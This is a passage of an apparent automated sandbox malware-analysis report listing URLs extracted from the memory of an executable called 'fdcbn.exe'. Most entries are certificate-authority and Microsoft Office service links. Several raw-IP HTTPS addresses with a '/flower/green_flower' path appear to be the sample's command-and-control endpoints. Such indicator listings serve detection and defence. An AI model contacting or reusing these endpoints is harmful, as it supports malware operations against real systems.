      Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpString found in binary or memory: http://web.ncdc.gov.sa/crl/nrcacomb1.crl0
      Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpString found in binary or memory: http://web.ncdc.gov.sa/crl/nrcaparta1.crl
      Source: fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpString found in binary or memory: http://www.acabogacia.org/doc0
      Source: fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpString found in binary or memory: http://www.acabogacia.org0
      Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpString found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0
      Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpString found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl0
      Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpString found in binary or memory: http://www.accv.es/legislacion_c.htm0U
      Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpString found in binary or memory: http://www.accv.es00
      Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpString found in binary or memory: http://www.agesic.gub.uy/acrn/acrn.crl0)
      Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpString found in binary or memory: http://www.agesic.gub.uy/acrn/cps_acrn.pdf0
      Source: fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpString found in binary or memory: http://www.ancert.com/cps0
      Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpString found in binary or memory: http://www.anf.es
      Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpString found in binary or memory: http://www.anf.es/AC/RC/ocsp0c
      Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpString found in binary or memory: http://www.anf.es/es/address-direccion.html
      Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpString found in binary or memory: http://www.ca.posta.rs/dokumentacija0h
      Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpString found in binary or memory: http://www.cert.fnmt.es/dpcs/0
      Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpString found in binary or memory: http://www.certeurope.fr/reference/pc-root2.pdf0
      Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpString found in binary or memory: http://www.certeurope.fr/reference/root2.crl0
      Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpString found in binary or memory: http://www.certicamara.com/dpc/0Z
      Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpString found in binary or memory: http://www.certplus.com/CRL/class1.crl0
      Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpString found in binary or memory: http://www.certplus.com/CRL/class2.crl0
      Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpString found in binary or memory: http://www.certplus.com/CRL/class3.crl0
      Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpString found in binary or memory: http://www.certplus.com/CRL/class3P.crl0
      Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpString found in binary or memory: http://www.certplus.com/CRL/class3TS.crl0
      Source: fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpString found in binary or memory: http://www.chambersign.org1
      Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpString found in binary or memory: http://www.comsign.co.il/cps0
      Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpString found in binary or memory: http://www.correo.com.uy/correocert/cps.pdf0
      Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpString found in binary or memory: http://www.datev.de/zertifikat-policy-bt0
      Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpString found in binary or memory: http://www.datev.de/zertifikat-policy-int0
      Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpString found in binary or memory: http://www.datev.de/zertifikat-policy-std0
      Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpString found in binary or memory: http://www.defence.gov.au/pki0
      Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpString found in binary or memory: http://www.disig.sk/ca/crl/ca_disig.crl0
      Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpString found in binary or memory: http://www.disig.sk/ca0f
      Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpString found in binary or memory: http://www.dnie.es/dpc0
      Source: fdcbn.exe, 00000001.00000002.253215972.00000236063F0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.504300437.000001DEF0E20000.00000002.00000001.sdmpString found in binary or memory: http://www.dsquery.dll
      Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpString found in binary or memory: http://www.e-me.lv/repository0
      Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpString found in binary or memory: http://www.e-szigno.hu/RootCA.crl
      Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpString found in binary or memory: http://www.e-szigno.hu/RootCA.crt0
      Source: fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpString found in binary or memory: http://www.e-szigno.hu/SZSZ/0
      Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpString found in binary or memory: http://www.e-trust.be/CPS/QNcerts
      Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpString found in binary or memory: http://www.ecee.gov.pt/dpc0
      Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpString found in binary or memory: http://www.echoworx.com/ca/root2/cps.pdf0
      Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpString found in binary or memory: http://www.eme.lv/repository0
      Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpString found in binary or memory: http://www.firmaprofesional.com/cps0
      Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpString found in binary or memory: http://www.globaltrust.info0
      Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpString found in binary or memory: http://www.globaltrust.info0=
      Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpString found in binary or memory: http://www.ica.co.il/repository/cps/PersonalID_Practice_Statement.pdf0
      Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpString found in binary or memory: http://www.informatik.admin.ch/PKI/links/CPS_2_16_756_1_17_3_1_0.pdf0
      Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpString found in binary or memory: http://www.oaticerts.com/repository.
      Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpString found in binary or memory: http://www.pki.admin.ch/cps/CPS_2_16_756_1_17_3_1_0.pdf09
      Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpString found in binary or memory: http://www.pki.admin.ch/cps/CPS_2_16_756_1_17_3_21_1.pdf0:
      Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpString found in binary or memory: http://www.pki.admin.ch/policy/CPS_2_16_756_1_17_3_21_1.pdf0
      Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpString found in binary or memory: http://www.pki.gva.es/cps0
      Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpString found in binary or memory: http://www.pki.gva.es/cps0%
      Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpString found in binary or memory: http://www.pkioverheid.nl/policies/root-policy-G20
      Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpString found in binary or memory: http://www.pkioverheid.nl/policies/root-policy0
      Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpString found in binary or memory: http://www.postsignum.cz/crl/psrootqca2.crl02
      Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpString found in binary or memory: http://www.quovadis.bm0
      Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpString found in binary or memory: http://www.quovadisglobal.com/cps0
      Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpString found in binary or memory: http://www.rcsc.lt/repository0
      Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpString found in binary or memory: http://www.sk.ee/cps/0
      Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpString found in binary or memory: http://www.sk.ee/juur/crl/0
      Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpString found in binary or memory: http://www.ssc.lt/cps03
      Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpString found in binary or memory: http://www.suscerte.gob.ve/dpc0
      Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpString found in binary or memory: http://www.suscerte.gob.ve/lcr0#
      Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpString found in binary or memory: http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl
      Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpString found in binary or memory: http://www.trustdst.com/certificates/policy/ACES-index.html0
      Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpString found in binary or memory: http://www.uce.gub.uy/acrn/acrn.crl0
      Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpString found in binary or memory: http://www.uce.gub.uy/informacion-tecnica/politicas/cp_acrn.pdf0G
      Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpString found in binary or memory: http://www2.postsignum.cz/crl/psrootqca2.crl01
      Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpString found in binary or memory: https://%s.pinrules.crt/%sendTraceLogca1.3.6.1.4.1.311.10.8.11.3.6.1.4.1.311.10.11.1.3.6.1.4.1.311.1
      Source: fdcbn.exe, 00000003.00000003.358864794.000001DEEECE6000.00000004.00000001.sdmp, fdcbn.exe, 00000003.00000003.449741388.000001DEEECE6000.00000004.00000001.sdmpString found in binary or memory: https://192.168.0.1/
      Source: fdcbn.exe, 00000003.00000003.358864794.000001DEEECE6000.00000004.00000001.sdmpString found in binary or memory: https://192.168.0.1/P
      Source: fdcbn.exe, 00000003.00000003.358864794.000001DEEECE6000.00000004.00000001.sdmpString found in binary or memory: https://192.168.0.1/X
      Source: fdcbn.exe, 00000003.00000003.497049838.000001DEEECD0000.00000004.00000001.sdmp, fdcbn.exe, 00000003.00000002.500144467.000001DEEEC82000.00000004.00000020.sdmpString found in binary or memory: https://192.168.0.1/flower/green_flower
      Source: fdcbn.exe, 00000003.00000003.497049838.000001DEEECD0000.00000004.00000001.sdmpString found in binary or memory: https://192.168.0.1/flower/green_flowerG
      Source: fdcbn.exe, 00000003.00000003.449741388.000001DEEECE6000.00000004.00000001.sdmpString found in binary or memory: https://192.168.0.1/flower/green_flowers
      Source: fdcbn.exe, 00000003.00000003.449741388.000001DEEECE6000.00000004.00000001.sdmpString found in binary or memory: https://192.168.0.1/h
      Source: fdcbn.exe, 00000003.00000003.449741388.000001DEEECE6000.00000004.00000001.sdmpString found in binary or memory: https://192.168.0.1/ings
      Source: fdcbn.exe, 00000003.00000002.500144467.000001DEEEC82000.00000004.00000020.sdmpString found in binary or memory: https://192.168.0.1/ingsLMEM8
      Source: fdcbn.exe, 00000003.00000003.449741388.000001DEEECE6000.00000004.00000001.sdmpString found in binary or memory: https://192.168.0.1/lower/green_flower
      Source: fdcbn.exe, 00000003.00000003.358864794.000001DEEECE6000.00000004.00000001.sdmpString found in binary or memory: https://192.168.0.1/p
      Source: fdcbn.exe, 00000003.00000003.358864794.000001DEEECE6000.00000004.00000001.sdmpString found in binary or memory: https://192.168.0.1/x
      Source: fdcbn.exe, 00000003.00000003.404298189.000001DEEECE6000.00000004.00000001.sdmp, fdcbn.exe, 00000003.00000002.500266048.000001DEEECE6000.00000004.00000020.sdmpString found in binary or memory: https://3.14.70.198/
      Source: fdcbn.exe, 00000003.00000003.404298189.000001DEEECE6000.00000004.00000001.sdmpString found in binary or memory: https://3.14.70.198/6
      Source: fdcbn.exe, 00000003.00000003.404298189.000001DEEECE6000.00000004.00000001.sdmpString found in binary or memory: https://3.14.70.198/H
      Source: fdcbn.exe, 00000003.00000003.404298189.000001DEEECE6000.00000004.00000001.sdmpString found in binary or memory: https://3.14.70.198/P
      Source: fdcbn.exe, 00000003.00000002.500144467.000001DEEEC82000.00000004.00000020.sdmp, fdcbn.exe, 00000003.00000003.404298189.000001DEEECE6000.00000004.00000001.sdmpString found in binary or memory: https://3.14.70.198/flower/green_flower
      Source: fdcbn.exe, 00000003.00000003.404298189.000001DEEECE6000.00000004.00000001.sdmpString found in binary or memory: https://3.14.70.198/flower/green_flowerj
      Source: fdcbn.exe, 00000003.00000003.404298189.000001DEEECE6000.00000004.00000001.sdmpString found in binary or memory: https://3.14.70.198/flower/green_flower~
      Source: fdcbn.exe, 00000003.00000003.404298189.000001DEEECE6000.00000004.00000001.sdmpString found in binary or memory: https://3.14.70.198/ings
      Source: fdcbn.exe, 00000003.00000003.358864794.000001DEEECE6000.00000004.00000001.sdmpString found in binary or memory: https://3.19.60.159/
      Source: fdcbn.exe, 00000003.00000003.496960236.000001DEEECE6000.00000004.00000001.sdmpString found in binary or memory: https://3.19.60.159/$
      Source: fdcbn.exe, 00000003.00000003.497049838.000001DEEECD0000.00000004.00000001.sdmpString found in binary or memory: https://3.19.60.159/flower/green_flower
      Source: fdcbn.exe, 00000003.00000003.358864794.000001DEEECE6000.00000004.00000001.sdmpString found in binary or memory: https://3.19.60.159/flower/green_flower;
      Source: fdcbn.exe, 00000003.00000003.358864794.000001DEEECE6000.00000004.00000001.sdmpString found in binary or memory: https://3.19.60.159/flower/green_flowerj
      Source: fdcbn.exe, 00000003.00000003.496960236.000001DEEECE6000.00000004.00000001.sdmpString found in binary or memory: https://3.19.60.159/flower/green_flowerl
      Source: fdcbn.exe, 00000003.00000003.496960236.000001DEEECE6000.00000004.00000001.sdmpString found in binary or memory: https://3.19.60.159/flower/green_flowerm32
      Source: fdcbn.exe, 00000003.00000002.500144467.000001DEEEC82000.00000004.00000020.sdmpString found in binary or memory: https://3.19.60.159/flower/green_flowern
      Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
      Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
      Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drString found in binary or memory: https://api.aadrm.com/
      Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
      Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
      Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drString found in binary or memory: https://api.cortana.ai
      Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drString found in binary or memory: https://api.diagnostics.office.com
      Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
      Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drString found in binary or memory: https://api.microsoftstream.com/api/
      Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drString found in binary or memory: https://api.office.net
      Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drString found in binary or memory: https://api.onedrive.com
      Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
      Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
      Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
      Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drString found in binary or memory: https://apis.live.net/v5.0/
      Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
      Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
      Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drString found in binary or memory: https://augloop.office.com
      Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drString found in binary or memory: https://augloop.office.com/v2
      Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drString found in binary or memory: https://autodiscover-s.outlook.com/
      Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
      Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drString found in binary or memory: https://cdn.entity.
      Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
      Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
      Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
      Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
      Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drString found in binary or memory: https://clients.config.office.net/
      Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
      Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
      Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
      Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
      Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
      Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drString found in binary or memory: https://config.edge.skype.com
      Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
      Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
      Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drString found in binary or memory: https://contentstorage.omex.office.net/addinclassifier/officeentities
      Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drString found in binary or memory: https://contentstorage.omex.office.net/addinclassifier/officeentitiesupdated
      Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drString found in binary or memory: https://cortana.ai
      Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drString found in binary or memory: https://cortana.ai/api
      Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drString found in binary or memory: https://cr.office.com
      Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpString found in binary or memory: https://crl.anf.es/AC/ANFServerCA.crl0
      Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drString found in binary or memory: https://dataservice.o365filtering.com
      Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drString found in binary or memory: https://dataservice.o365filtering.com/
      Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
      Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
      Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
      Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drString found in binary or memory: https://dev.cortana.ai
      Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
      Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
      Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drString found in binary or memory: https://devnull.onenote.com
      Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drString found in binary or memory: https://directory.services.
      Source: fdcbn.exe, 00000001.00000002.251376640.0000023605BA0000.00000002.00000001.sdmp, fdcbn.exe, 00000003.00000002.500720324.000001DEF05E0000.00000002.00000001.sdmpString found in binary or memory: https://eca.hinet.net/repository0
      Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
      Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
      Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
      Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
      Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
      Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
      Source: 06F087F7-8F9B-422A-A7FF-5A5B7E4DEC24.0.drString found in binary or memory: https://graph.ppe.windows.net
